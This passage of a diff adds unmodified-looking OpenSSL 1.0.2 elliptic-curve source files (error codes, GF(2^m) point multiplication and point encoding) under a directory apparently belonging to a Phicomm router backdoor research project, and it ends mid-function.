+# define EC_F_EC_WNAF_PRECOMPUTE_MULT                     188
+# define EC_F_I2D_ECPARAMETERS                            190
+# define EC_F_I2D_ECPKPARAMETERS                          191
+# define EC_F_I2D_ECPRIVATEKEY                            192
+# define EC_F_I2O_ECPUBLICKEY                             151
+# define EC_F_NISTP224_PRE_COMP_NEW                       227
+# define EC_F_NISTP256_PRE_COMP_NEW                       236
+# define EC_F_NISTP521_PRE_COMP_NEW                       237
+# define EC_F_ECP_NISTZ256_GET_AFFINE                     240
+# define EC_F_ECP_NISTZ256_POINTS_MUL                     241
+# define EC_F_ECP_NISTZ256_WINDOWED_MUL                   242
+# define EC_F_ECP_NISTZ256_MULT_PRECOMPUTE                243
+# define EC_F_ECP_NISTZ256_PRE_COMP_NEW                   244
+# define EC_F_O2I_ECPUBLICKEY                             152
+# define EC_F_OLD_EC_PRIV_DECODE                          222
+# define EC_F_PKEY_EC_CTRL                                197
+# define EC_F_PKEY_EC_CTRL_STR                            198
+# define EC_F_PKEY_EC_DERIVE                              217
+# define EC_F_PKEY_EC_KEYGEN                              199
+# define EC_F_PKEY_EC_PARAMGEN                            219
+# define EC_F_PKEY_EC_SIGN                                218
+
+/* Reason codes. */
+# define EC_R_ASN1_ERROR                                  115
+# define EC_R_ASN1_UNKNOWN_FIELD                          116
+# define EC_R_BIGNUM_OUT_OF_RANGE                         144
+# define EC_R_BUFFER_TOO_SMALL                            100
+# define EC_R_COORDINATES_OUT_OF_RANGE                    146
+# define EC_R_D2I_ECPKPARAMETERS_FAILURE                  117
+# define EC_R_DECODE_ERROR                                142
+# define EC_R_DISCRIMINANT_IS_ZERO                        118
+# define EC_R_EC_GROUP_NEW_BY_NAME_FAILURE                119
+# define EC_R_FIELD_TOO_LARGE                             143
+# define EC_R_GF2M_NOT_SUPPORTED                          147
+# define EC_R_GROUP2PKPARAMETERS_FAILURE                  120
+# define EC_R_I2D_ECPKPARAMETERS_FAILURE                  121
+# define EC_R_INCOMPATIBLE_OBJECTS                        101
+# define EC_R_INVALID_ARGUMENT                            112
+# define EC_R_INVALID_COMPRESSED_POINT                    110
+# define EC_R_INVALID_COMPRESSION_BIT                     109
+# define EC_R_INVALID_CURVE                               141
+# define EC_R_INVALID_DIGEST                              151
+# define EC_R_INVALID_DIGEST_TYPE                         138
+# define EC_R_INVALID_ENCODING                            102
+# define EC_R_INVALID_FIELD                               103
+# define EC_R_INVALID_FORM                                104
+# define EC_R_INVALID_GROUP_ORDER                         122
+# define EC_R_INVALID_PENTANOMIAL_BASIS                   132
+# define EC_R_INVALID_PRIVATE_KEY                         123
+# define EC_R_INVALID_TRINOMIAL_BASIS                     137
+# define EC_R_KDF_PARAMETER_ERROR                         148
+# define EC_R_KEYS_NOT_SET                                140
+# define EC_R_MISSING_PARAMETERS                          124
+# define EC_R_MISSING_PRIVATE_KEY                         125
+# define EC_R_NOT_A_NIST_PRIME                            135
+# define EC_R_NOT_A_SUPPORTED_NIST_PRIME                  136
+# define EC_R_NOT_IMPLEMENTED                             126
+# define EC_R_NOT_INITIALIZED                             111
+# define EC_R_NO_FIELD_MOD                                133
+# define EC_R_NO_PARAMETERS_SET                           139
+# define EC_R_PASSED_NULL_PARAMETER                       134
+# define EC_R_PEER_KEY_ERROR                              149
+# define EC_R_PKPARAMETERS2GROUP_FAILURE                  127
+# define EC_R_POINT_AT_INFINITY                           106
+# define EC_R_POINT_IS_NOT_ON_CURVE                       107
+# define EC_R_SHARED_INFO_ERROR                           150
+# define EC_R_SLOT_FULL                                   108
+# define EC_R_UNDEFINED_GENERATOR                         113
+# define EC_R_UNDEFINED_ORDER                             128
+# define EC_R_UNKNOWN_GROUP                               129
+# define EC_R_UNKNOWN_ORDER                               114
+# define EC_R_UNSUPPORTED_FIELD                           131
+# define EC_R_WRONG_CURVE_PARAMETERS                      145
+# define EC_R_WRONG_ORDER                                 130
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_mult.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_mult.c
new file mode 100644
index 0000000..68cc877
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_mult.c
@@ -0,0 +1,463 @@
+/* crypto/ec/ec2_mult.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The software is originally written by Sheueling Chang Shantz and
+ * Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/err.h>
+
+#include "ec_lcl.h"
+
+#ifndef OPENSSL_NO_EC2M
+
+/*-
+ * Compute the x-coordinate x/z for the point 2*(x/z) in Montgomery projective
+ * coordinates.
+ * Uses algorithm Mdouble in appendix of
+ *     Lopez, J. and Dahab, R.  "Fast multiplication on elliptic curves over
+ *     GF(2^m) without precomputation" (CHES '99, LNCS 1717).
+ * modified to not require precomputation of c=b^{2^{m-1}}.
+ */
+static int gf2m_Mdouble(const EC_GROUP *group, BIGNUM *x, BIGNUM *z,
+                        BN_CTX *ctx)
+{
+    BIGNUM *t1;
+    int ret = 0;
+
+    /* Since Mdouble is static we can guarantee that ctx != NULL. */
+    BN_CTX_start(ctx);
+    t1 = BN_CTX_get(ctx);
+    if (t1 == NULL)
+        goto err;
+
+    if (!group->meth->field_sqr(group, x, x, ctx))
+        goto err;
+    if (!group->meth->field_sqr(group, t1, z, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, z, x, t1, ctx))
+        goto err;
+    if (!group->meth->field_sqr(group, x, x, ctx))
+        goto err;
+    if (!group->meth->field_sqr(group, t1, t1, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, t1, &group->b, t1, ctx))
+        goto err;
+    if (!BN_GF2m_add(x, x, t1))
+        goto err;
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*-
+ * Compute the x-coordinate x1/z1 for the point (x1/z1)+(x2/x2) in Montgomery
+ * projective coordinates.
+ * Uses algorithm Madd in appendix of
+ *     Lopez, J. and Dahab, R.  "Fast multiplication on elliptic curves over
+ *     GF(2^m) without precomputation" (CHES '99, LNCS 1717).
+ */
+static int gf2m_Madd(const EC_GROUP *group, const BIGNUM *x, BIGNUM *x1,
+                     BIGNUM *z1, const BIGNUM *x2, const BIGNUM *z2,
+                     BN_CTX *ctx)
+{
+    BIGNUM *t1, *t2;
+    int ret = 0;
+
+    /* Since Madd is static we can guarantee that ctx != NULL. */
+    BN_CTX_start(ctx);
+    t1 = BN_CTX_get(ctx);
+    t2 = BN_CTX_get(ctx);
+    if (t2 == NULL)
+        goto err;
+
+    if (!BN_copy(t1, x))
+        goto err;
+    if (!group->meth->field_mul(group, x1, x1, z2, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, z1, z1, x2, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, t2, x1, z1, ctx))
+        goto err;
+    if (!BN_GF2m_add(z1, z1, x1))
+        goto err;
+    if (!group->meth->field_sqr(group, z1, z1, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, x1, z1, t1, ctx))
+        goto err;
+    if (!BN_GF2m_add(x1, x1, t2))
+        goto err;
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*-
+ * Compute the x, y affine coordinates from the point (x1, z1) (x2, z2)
+ * using Montgomery point multiplication algorithm Mxy() in appendix of
+ *     Lopez, J. and Dahab, R.  "Fast multiplication on elliptic curves over
+ *     GF(2^m) without precomputation" (CHES '99, LNCS 1717).
+ * Returns:
+ *     0 on error
+ *     1 if return value should be the point at infinity
+ *     2 otherwise
+ */
+static int gf2m_Mxy(const EC_GROUP *group, const BIGNUM *x, const BIGNUM *y,
+                    BIGNUM *x1, BIGNUM *z1, BIGNUM *x2, BIGNUM *z2,
+                    BN_CTX *ctx)
+{
+    BIGNUM *t3, *t4, *t5;
+    int ret = 0;
+
+    if (BN_is_zero(z1)) {
+        BN_zero(x2);
+        BN_zero(z2);
+        return 1;
+    }
+
+    if (BN_is_zero(z2)) {
+        if (!BN_copy(x2, x))
+            return 0;
+        if (!BN_GF2m_add(z2, x, y))
+            return 0;
+        return 2;
+    }
+
+    /* Since Mxy is static we can guarantee that ctx != NULL. */
+    BN_CTX_start(ctx);
+    t3 = BN_CTX_get(ctx);
+    t4 = BN_CTX_get(ctx);
+    t5 = BN_CTX_get(ctx);
+    if (t5 == NULL)
+        goto err;
+
+    if (!BN_one(t5))
+        goto err;
+
+    if (!group->meth->field_mul(group, t3, z1, z2, ctx))
+        goto err;
+
+    if (!group->meth->field_mul(group, z1, z1, x, ctx))
+        goto err;
+    if (!BN_GF2m_add(z1, z1, x1))
+        goto err;
+    if (!group->meth->field_mul(group, z2, z2, x, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, x1, z2, x1, ctx))
+        goto err;
+    if (!BN_GF2m_add(z2, z2, x2))
+        goto err;
+
+    if (!group->meth->field_mul(group, z2, z2, z1, ctx))
+        goto err;
+    if (!group->meth->field_sqr(group, t4, x, ctx))
+        goto err;
+    if (!BN_GF2m_add(t4, t4, y))
+        goto err;
+    if (!group->meth->field_mul(group, t4, t4, t3, ctx))
+        goto err;
+    if (!BN_GF2m_add(t4, t4, z2))
+        goto err;
+
+    if (!group->meth->field_mul(group, t3, t3, x, ctx))
+        goto err;
+    if (!group->meth->field_div(group, t3, t5, t3, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, t4, t3, t4, ctx))
+        goto err;
+    if (!group->meth->field_mul(group, x2, x1, t3, ctx))
+        goto err;
+    if (!BN_GF2m_add(z2, x2, x))
+        goto err;
+
+    if (!group->meth->field_mul(group, z2, z2, t4, ctx))
+        goto err;
+    if (!BN_GF2m_add(z2, z2, y))
+        goto err;
+
+    ret = 2;
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*-
+ * Computes scalar*point and stores the result in r.
+ * point can not equal r.
+ * Uses a modified algorithm 2P of
+ *     Lopez, J. and Dahab, R.  "Fast multiplication on elliptic curves over
+ *     GF(2^m) without precomputation" (CHES '99, LNCS 1717).
+ *
+ * To protect against side-channel attack the function uses constant time swap,
+ * avoiding conditional branches.
+ */
+static int ec_GF2m_montgomery_point_multiply(const EC_GROUP *group,
+                                             EC_POINT *r,
+                                             const BIGNUM *scalar,
+                                             const EC_POINT *point,
+                                             BN_CTX *ctx)
+{
+    BIGNUM *x1, *x2, *z1, *z2;
+    int ret = 0, i;
+    BN_ULONG mask, word;
+
+    if (r == point) {
+        ECerr(EC_F_EC_GF2M_MONTGOMERY_POINT_MULTIPLY, EC_R_INVALID_ARGUMENT);
+        return 0;
+    }
+
+    /* if result should be point at infinity */
+    if ((scalar == NULL) || BN_is_zero(scalar) || (point == NULL) ||
+        EC_POINT_is_at_infinity(group, point)) {
+        return EC_POINT_set_to_infinity(group, r);
+    }
+
+    /* only support affine coordinates */
+    if (!point->Z_is_one)
+        return 0;
+
+    /*
+     * Since point_multiply is static we can guarantee that ctx != NULL.
+     */
+    BN_CTX_start(ctx);
+    x1 = BN_CTX_get(ctx);
+    z1 = BN_CTX_get(ctx);
+    if (z1 == NULL)
+        goto err;
+
+    x2 = &r->X;
+    z2 = &r->Y;
+
+    bn_wexpand(x1, group->field.top);
+    bn_wexpand(z1, group->field.top);
+    bn_wexpand(x2, group->field.top);
+    bn_wexpand(z2, group->field.top);
+
+    if (!BN_GF2m_mod_arr(x1, &point->X, group->poly))
+        goto err;               /* x1 = x */
+    if (!BN_one(z1))
+        goto err;               /* z1 = 1 */
+    if (!group->meth->field_sqr(group, z2, x1, ctx))
+        goto err;               /* z2 = x1^2 = x^2 */
+    if (!group->meth->field_sqr(group, x2, z2, ctx))
+        goto err;
+    if (!BN_GF2m_add(x2, x2, &group->b))
+        goto err;               /* x2 = x^4 + b */
+
+    /* find top most bit and go one past it */
+    i = scalar->top - 1;
+    mask = BN_TBIT;
+    word = scalar->d[i];
+    while (!(word & mask))
+        mask >>= 1;
+    mask >>= 1;
+    /* if top most bit was at word break, go to next word */
+    if (!mask) {
+        i--;
+        mask = BN_TBIT;
+    }
+
+    for (; i >= 0; i--) {
+        word = scalar->d[i];
+        while (mask) {
+            BN_consttime_swap(word & mask, x1, x2, group->field.top);
+            BN_consttime_swap(word & mask, z1, z2, group->field.top);
+            if (!gf2m_Madd(group, &point->X, x2, z2, x1, z1, ctx))
+                goto err;
+            if (!gf2m_Mdouble(group, x1, z1, ctx))
+                goto err;
+            BN_consttime_swap(word & mask, x1, x2, group->field.top);
+            BN_consttime_swap(word & mask, z1, z2, group->field.top);
+            mask >>= 1;
+        }
+        mask = BN_TBIT;
+    }
+
+    /* convert out of "projective" coordinates */
+    i = gf2m_Mxy(group, &point->X, &point->Y, x1, z1, x2, z2, ctx);
+    if (i == 0)
+        goto err;
+    else if (i == 1) {
+        if (!EC_POINT_set_to_infinity(group, r))
+            goto err;
+    } else {
+        if (!BN_one(&r->Z))
+            goto err;
+        r->Z_is_one = 1;
+    }
+
+    /* GF(2^m) field elements should always have BIGNUM::neg = 0 */
+    BN_set_negative(&r->X, 0);
+    BN_set_negative(&r->Y, 0);
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*-
+ * Computes the sum
+ *     scalar*group->generator + scalars[0]*points[0] + ... + scalars[num-1]*points[num-1]
+ * gracefully ignoring NULL scalar values.
+ */
+int ec_GF2m_simple_mul(const EC_GROUP *group, EC_POINT *r,
+                       const BIGNUM *scalar, size_t num,
+                       const EC_POINT *points[], const BIGNUM *scalars[],
+                       BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    int ret = 0;
+    size_t i;
+    EC_POINT *p = NULL;
+    EC_POINT *acc = NULL;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    /*
+     * This implementation is more efficient than the wNAF implementation for
+     * 2 or fewer points.  Use the ec_wNAF_mul implementation for 3 or more
+     * points, or if we can perform a fast multiplication based on
+     * precomputation.
+     */
+    if ((scalar && (num > 1)) || (num > 2)
+        || (num == 0 && EC_GROUP_have_precompute_mult(group))) {
+        ret = ec_wNAF_mul(group, r, scalar, num, points, scalars, ctx);
+        goto err;
+    }
+
+    if ((p = EC_POINT_new(group)) == NULL)
+        goto err;
+    if ((acc = EC_POINT_new(group)) == NULL)
+        goto err;
+
+    if (!EC_POINT_set_to_infinity(group, acc))
+        goto err;
+
+    if (scalar) {
+        if (!ec_GF2m_montgomery_point_multiply
+            (group, p, scalar, group->generator, ctx))
+            goto err;
+        if (BN_is_negative(scalar))
+            if (!group->meth->invert(group, p, ctx))
+                goto err;
+        if (!group->meth->add(group, acc, acc, p, ctx))
+            goto err;
+    }
+
+    for (i = 0; i < num; i++) {
+        if (!ec_GF2m_montgomery_point_multiply
+            (group, p, scalars[i], points[i], ctx))
+            goto err;
+        if (BN_is_negative(scalars[i]))
+            if (!group->meth->invert(group, p, ctx))
+                goto err;
+        if (!group->meth->add(group, acc, acc, p, ctx))
+            goto err;
+    }
+
+    if (!EC_POINT_copy(r, acc))
+        goto err;
+
+    ret = 1;
+
+ err:
+    if (p)
+        EC_POINT_free(p);
+    if (acc)
+        EC_POINT_free(acc);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*
+ * Precomputation for point multiplication: fall back to wNAF methods because
+ * ec_GF2m_simple_mul() uses ec_wNAF_mul() if appropriate
+ */
+
+int ec_GF2m_precompute_mult(EC_GROUP *group, BN_CTX *ctx)
+{
+    return ec_wNAF_precompute_mult(group, ctx);
+}
+
+int ec_GF2m_have_precompute_mult(const EC_GROUP *group)
+{
+    return ec_wNAF_have_precompute_mult(group);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_oct.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_oct.c
new file mode 100644
index 0000000..c245d88
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_oct.c
@@ -0,0 +1,403 @@
+/* crypto/ec/ec2_oct.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The software is originally written by Sheueling Chang Shantz and
+ * Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/err.h>
+
+#include "ec_lcl.h"
+
+#ifndef OPENSSL_NO_EC2M
+
+/*-
+ * Calculates and sets the affine coordinates of an EC_POINT from the given
+ * compressed coordinates.  Uses algorithm 2.3.4 of SEC 1.
+ * Note that the simple implementation only uses affine coordinates.
+ *
+ * The method is from the following publication:
+ *
+ *     Harper, Menezes, Vanstone:
+ *     "Public-Key Cryptosystems with Very Small Key Lengths",
+ *     EUROCRYPT '92, Springer-Verlag LNCS 658,
+ *     published February 1993
+ *
+ * US Patents 6,141,420 and 6,618,483 (Vanstone, Mullin, Agnew) describe
+ * the same method, but claim no priority date earlier than July 29, 1994
+ * (and additionally fail to cite the EUROCRYPT '92 publication as prior art).
+ */
+int ec_GF2m_simple_set_compressed_coordinates(const EC_GROUP *group,
+                                              EC_POINT *point,
+                                              const BIGNUM *x_, int y_bit,
+                                              BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *tmp, *x, *y, *z;
+    int ret = 0, z0;
+
+    /* clear error queue */
+    ERR_clear_error();
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    y_bit = (y_bit != 0) ? 1 : 0;
+
+    BN_CTX_start(ctx);
+    tmp = BN_CTX_get(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    z = BN_CTX_get(ctx);
+    if (z == NULL)
+        goto err;
+
+    if (!BN_GF2m_mod_arr(x, x_, group->poly))
+        goto err;
+    if (BN_is_zero(x)) {
+        if (!BN_GF2m_mod_sqrt_arr(y, &group->b, group->poly, ctx))
+            goto err;
+    } else {
+        if (!group->meth->field_sqr(group, tmp, x, ctx))
+            goto err;
+        if (!group->meth->field_div(group, tmp, &group->b, tmp, ctx))
+            goto err;
+        if (!BN_GF2m_add(tmp, &group->a, tmp))
+            goto err;
+        if (!BN_GF2m_add(tmp, x, tmp))
+            goto err;
+        if (!BN_GF2m_mod_solve_quad_arr(z, tmp, group->poly, ctx)) {
+            unsigned long err = ERR_peek_last_error();
+
+            if (ERR_GET_LIB(err) == ERR_LIB_BN
+                && ERR_GET_REASON(err) == BN_R_NO_SOLUTION) {
+                ERR_clear_error();
+                ECerr(EC_F_EC_GF2M_SIMPLE_SET_COMPRESSED_COORDINATES,
+                      EC_R_INVALID_COMPRESSED_POINT);
+            } else
+                ECerr(EC_F_EC_GF2M_SIMPLE_SET_COMPRESSED_COORDINATES,
+                      ERR_R_BN_LIB);
+            goto err;
+        }
+        z0 = (BN_is_odd(z)) ? 1 : 0;
+        if (!group->meth->field_mul(group, y, x, z, ctx))
+            goto err;
+        if (z0 != y_bit) {
+            if (!BN_GF2m_add(y, y, x))
+                goto err;
+        }
+    }
+
+    if (!EC_POINT_set_affine_coordinates_GF2m(group, point, x, y, ctx))
+        goto err;
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*
+ * Converts an EC_POINT to an octet string. If buf is NULL, the encoded
+ * length will be returned. If the length len of buf is smaller than required
+ * an error will be returned.
+ */
+size_t ec_GF2m_simple_point2oct(const EC_GROUP *group, const EC_POINT *point,
+                                point_conversion_form_t form,
+                                unsigned char *buf, size_t len, BN_CTX *ctx)
+{
+    size_t ret;
+    BN_CTX *new_ctx = NULL;
+    int used_ctx = 0;
+    BIGNUM *x, *y, *yxi;
+    size_t field_len, i, skip;
+
+    if ((form != POINT_CONVERSION_COMPRESSED)
+        && (form != POINT_CONVERSION_UNCOMPRESSED)
+        && (form != POINT_CONVERSION_HYBRID)) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_POINT2OCT, EC_R_INVALID_FORM);
+        goto err;
+    }
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        /* encodes to a single 0 octet */
+        if (buf != NULL) {
+            if (len < 1) {
+                ECerr(EC_F_EC_GF2M_SIMPLE_POINT2OCT, EC_R_BUFFER_TOO_SMALL);
+                return 0;
+            }
+            buf[0] = 0;
+        }
+        return 1;
+    }
+
+    /* ret := required output buffer length */
+    field_len = (EC_GROUP_get_degree(group) + 7) / 8;
+    ret =
+        (form ==
+         POINT_CONVERSION_COMPRESSED) ? 1 + field_len : 1 + 2 * field_len;
+
+    /* if 'buf' is NULL, just return required length */
+    if (buf != NULL) {
+        if (len < ret) {
+            ECerr(EC_F_EC_GF2M_SIMPLE_POINT2OCT, EC_R_BUFFER_TOO_SMALL);
+            goto err;
+        }
+
+        if (ctx == NULL) {
+            ctx = new_ctx = BN_CTX_new();
+            if (ctx == NULL)
+                return 0;
+        }
+
+        BN_CTX_start(ctx);
+        used_ctx = 1;
+        x = BN_CTX_get(ctx);
+        y = BN_CTX_get(ctx);
+        yxi = BN_CTX_get(ctx);
+        if (yxi == NULL)
+            goto err;
+
+        if (!EC_POINT_get_affine_coordinates_GF2m(group, point, x, y, ctx))
+            goto err;
+
+        buf[0] = form;
+        if ((form != POINT_CONVERSION_UNCOMPRESSED) && !BN_is_zero(x)) {
+            if (!group->meth->field_div(group, yxi, y, x, ctx))
+                goto err;
+            if (BN_is_odd(yxi))
+                buf[0]++;
+        }
+
+        i = 1;
+
+        skip = field_len - BN_num_bytes(x);
+        if (skip > field_len) {
+            ECerr(EC_F_EC_GF2M_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+        while (skip > 0) {
+            buf[i++] = 0;
+            skip--;
+        }
+        skip = BN_bn2bin(x, buf + i);
+        i += skip;
+        if (i != 1 + field_len) {
+            ECerr(EC_F_EC_GF2M_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+
+        if (form == POINT_CONVERSION_UNCOMPRESSED
+            || form == POINT_CONVERSION_HYBRID) {
+            skip = field_len - BN_num_bytes(y);
+            if (skip > field_len) {
+                ECerr(EC_F_EC_GF2M_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            while (skip > 0) {
+                buf[i++] = 0;
+                skip--;
+            }
+            skip = BN_bn2bin(y, buf + i);
+            i += skip;
+        }
+
+        if (i != ret) {
+            ECerr(EC_F_EC_GF2M_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+    }
+
+    if (used_ctx)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+
+ err:
+    if (used_ctx)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return 0;
+}
+
+/*
+ * Converts an octet string representation to an EC_POINT. Note that the
+ * simple implementation only uses affine coordinates.
+ */
+int ec_GF2m_simple_oct2point(const EC_GROUP *group, EC_POINT *point,
+                             const unsigned char *buf, size_t len,
+                             BN_CTX *ctx)
+{
+    point_conversion_form_t form;
+    int y_bit;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y, *yxi;
+    size_t field_len, enc_len;
+    int ret = 0;
+
+    if (len == 0) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_BUFFER_TOO_SMALL);
+        return 0;
+    }
+    form = buf[0];
+    y_bit = form & 1;
+    form = form & ~1U;
+    if ((form != 0) && (form != POINT_CONVERSION_COMPRESSED)
+        && (form != POINT_CONVERSION_UNCOMPRESSED)
+        && (form != POINT_CONVERSION_HYBRID)) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        return 0;
+    }
+    if ((form == 0 || form == POINT_CONVERSION_UNCOMPRESSED) && y_bit) {
